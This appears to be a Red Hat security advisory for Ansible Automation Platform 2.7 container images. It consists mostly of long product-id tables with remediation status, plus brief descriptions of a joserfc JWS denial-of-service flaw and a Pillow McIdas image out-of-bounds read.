| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — | ||
